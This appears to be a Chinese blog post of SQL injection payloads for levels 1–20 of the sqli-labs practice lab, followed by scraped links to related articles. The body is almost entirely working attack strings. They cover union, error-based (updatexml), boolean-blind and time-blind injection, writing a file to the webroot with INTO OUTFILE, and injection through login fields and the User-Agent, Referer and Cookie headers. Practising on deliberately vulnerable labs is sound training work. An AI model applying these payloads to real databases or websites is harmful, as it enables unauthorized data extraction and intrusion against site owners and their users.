sqlilabs 1-20关 payload
1、
联合查询注入:
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,user(),3 --+
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,(select table_name from information_schema.tables where table_schema='security' limit 0,1),3 --+
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),3 --+
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,(select email_id from security.emails limit 1,1),3 --+
2、
同1
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,user(),3
3、
同1
http://127.0.0.1/sqli/Less-3/?id=-1') union select 1,user(),3 --+
4、
同1
http://127.0.0.1/sqli/Less-3/?id=-1") union select 1,user(),3 --+
5、
报错注入:
爆库名:http://127.0.0.1/sqli/Less-5/?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
爆表名:http://127.0.0.1/sqli/Less-5/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1) --+
爆字段名:http://127.0.0.1/sqli/Less-5/?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1) --+
爆数据:http://127.0.0.1/sqli/Less-5/?id=1' and updatexml(1,concat(0x7e,(select id from security.emails limit 0,1),0x7e),1) --+
布尔盲注:
http://127.0.0.1/sqli/Less-5/?id=1' and left(version(),1)=5 --+
http://127.0.0.1/sqli/Less-5/?id=1' and length(database())=8 --+
爆库名:http://127.0.0.1/sqli/Less-5/?id=1' and left(database(),1)='s' --+ or http://127.0.0.1/sqli/Less-5/?id=1' and substr(database(),1,1)='s' --+ subsur从第一个字符开始每次只返回一个
爆表名:http://127.0.0.1/sqli/Less-5/?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e' --+
爆字段名:http://127.0.0.1/sqli/Less-5/?id=1' and substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),1,1)='i' --+
爆数据:http://127.0.0.1/sqli/Less-5/?id=1' and substr((select id from security.emails limit 0,1),1,1)='1' --+
时间盲注:
http://127.0.0.1/sqli/Less-5/?id=1' and if(length(database())>1,sleep(5),1) --+
爆库名:http://127.0.0.1/sqli/Less-5/?id=1' and if(substr(database(),1,1)='s',sleep(5),1) --+
爆表名:http://127.0.0.1/sqli/Less-5/?id=1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(5),1) --+
爆字段名:http://127.0.0.1/sqli/Less-5/?id=1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),1,1)='i',sleep(5),1) --+
爆数据:http://127.0.0.1/sqli/Less-5/?id=1' and if(substr((select id from security.emails limit 0,1),1,1)=1,sleep(5),1) --+
6、
同5
http://127.0.0.1/sqli/Less-6/?id=1" and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
http://127.0.0.1/sqli/Less-5/?id=1' and left(version(),1)=5 --+
7、
http://192.168.43.83/sqli/Less-7/?id=-1')) UNION SELECT 1,2,3 into outfile "C:\\phpStudy\\PHPTutorial\\WWW\\sqli\\Less-7\\1.txt"#
8、
同5 布尔或时间盲注(无错误回显,所以无法报错注入)
http://127.0.0.1/sqli/Less-8/?id=1' and length(database())>5 --+
9、
同5 时间盲注
10、
同5 双引号闭合 时间盲注
http://127.0.0.1/sqli/Less-10/?id=1" and if(substr(database(),1,1)='s',sleep(5),1) --+
11、
POST注入 (万能密码)
联合查询注入/报错注入/盲注??
admin' order by 3 #
1' union select user(),database() #
12、
1") union select user(),database() #
13、
报错注入
1') and updatexml(1,concat(0x7e,database(),0x7e),1) #
14、
双引号闭合
1" and updatexml(1,concat(0x7e,database(),0x7e),1) #
15、
布尔盲注
admin' and length(database())>1 #
16、
时间盲注
admin") and if(ascii(substr(database(),1,1))>1,sleep(5),1) #
17、
报错注入
username:admin
password:1' and updatexml(1,concat(0x7e,database(),0x7e),1) #
18、
User-Agent: 1' and updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1
19、
Referer: 1' and updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1
20、
Cookie: uname=admin' and updatexml(1,concat(0x7e,database(),0x7e),1) #
sqlilabs 1-20关 payload的更多相关文章
- sqli-labs通关----11~20关
第十一关 从第十一关开始,就开始用post来提交数据了,我们每关的目的都是获取users表下password字段的内容. post是一种数据提交方式,它主要是指数据从客户端提交到服务器端,例如,我们常 ...
- SQL注入之Sqli-labs系列第四十一关(基于堆叠注入的盲注)和四十二关四十三关四十四关四十五关
0x1普通测试方式 (1)输入and1=1和and1=2测试,返回错误,证明存在注入 (2)union select联合查询 (3)查询表名 (4)其他 payload: ,( ,( 0x2 堆叠注入 ...
- SQL注入之Sqli-labs系列第一关
在开始接触渗透测试开始,最初玩的最多的就是Sql注入,注入神器阿D.明小子.穿山甲等一切工具风靡至今.当初都是以日站为乐趣,从安全法实施后在没有任何授权的情况下,要想练手只能本地环境进行练手,对于sq ...
- sqli-labs系列——第一关
先看了一遍关于sql的一些知识点,通关sqli-labs加深下印象.之前也因为作业的原因通关过前10关,但那时候不懂得原理,跟着网上的教程做的,所以这次尝试自己思考通关. less1 尝试and1=2 ...
- XSS挑战20关
第一关: 没有过滤,直接构造payload过关: http://127.0.0.1/xssgame/level1.php?name=test%3Cscript%3Ealert%28111%29%3C/ ...
- SQL注入之Sqli-labs系列第九关和第十关(基于时间盲注的注入)
开始挑战第九关(Blind- Time based- Single Quotes- String)和第十关( Blind- Time based- Double Quotes- String) gog ...
- SQL注入之Sqli-labs系列第二关
废话不在多说 let's go! 继续挑战第二关(Error Based- Intiger) 同样的前奏,就不截图了 ,and 1=1和and 1=2进行测试,出现报错 还原sql语句 查看源代 ...
- sqli-labs第5关布尔盲注pyhton脚本
import requests import os #此函数先判断数据库长度 def length(url,str): num = 1 while True: str_num = '%d' %num ...
- sqli-labs系列——第二关
less2 and 1=1有回显,and 1=2无回显,为数值型注入 order by 4–+报错,有3行 查询数据库名 ?id=0' union select 1,(select group_con ...
随机推荐
- zabbix 监控https URL
由于生产环境的需要,zabbix 需要监控https的url,但是因为zabbix 是aws ec2 zabbix web绑定了域名,所以没有办法所代理. 有兴趣的可以看官方文档 https://ww ...
- SSM框架处理跨域问题
什么是跨域 跨域是指从一个域名的网页去请求另一个域名的资源.比如从www.baidu.com 页面去请求 www.google.com 的资源.跨域的严格一点的定义是:只要 协议,域名,端口有任何一个 ...
- sql 获取当前时间的前一天,不加时分秒
select convert(datetime,convert(char(20),dateadd(day,-1,getdate()),102)) -1 为减去天数 getdate 为 获取当前时间
- 关于wifi营销的看过来
亲测可用.对于一个开发者来说,终于如获至宝.详情联系qq2455994690.源码可二开.包括微信一键关注上网,手机验证码上网.
- 【LGR-072】回首过去
题目 点这里看题目. 分析 可以发现,符合条件的分数约分后,其分母必须为\(2^m5^k\).因此,原分数一定可以表示为: \[\frac{XY}{2^m5^kX} \] 其中\((10, ...
- AutoIt实现文件上传
AutoIt目前最新是v3版本,这是一个使用类似BASIC脚本语言的免费软件,它设计用于Windows GUI(图形用户界面)中进行自动化操作.它利用模拟键盘按键,鼠标移动和窗口/控件的组合来实现自动 ...
- Zookeeper——分布式一致性协议及Zookeeper Leader选举原理
文章目录 一.引言 二.从ACID到CAP/BASE 三.分布式一致性协议 1. 2PC和3PC 2PC 发起事务请求 事务提交/回滚 3PC canCommit preCommit doCommit ...
- ca71a_c++_指向函数的指针_通过指针调用函数txwtech
/*ca71a_c++_指向函数的指针_通过指针调用函数用typedef简化函数指针的定义简化前: bool(*pf)(const string&, const string &); ...
- 登录CentOS用户很慢/usr/bin/xauth: timeout in locking authority file /home/***/.Xauthority
当使用非root用户登录CentOS时,发现很慢,而且弹出以下信息: /usr/bin/xauth: timeout in locking authority file /home/***/.Xau ...
- 【漏洞二】Apache HTTP Server "httpOnly" Cookie信息泄露漏洞
[漏洞] Apache HTTP Server "httpOnly" Cookie信息泄露漏洞 [原因] 服务器问题 Apache HTTP Server在对状态代码400的默认错 ...